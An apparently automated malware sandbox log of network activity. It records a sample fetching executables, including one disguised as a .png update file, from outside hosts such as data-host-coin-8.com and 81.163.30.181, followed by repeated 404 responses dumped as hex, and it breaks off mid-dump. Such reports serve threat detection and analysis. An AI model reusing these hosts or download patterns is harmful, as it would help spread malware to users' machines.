                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 20:03:44 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 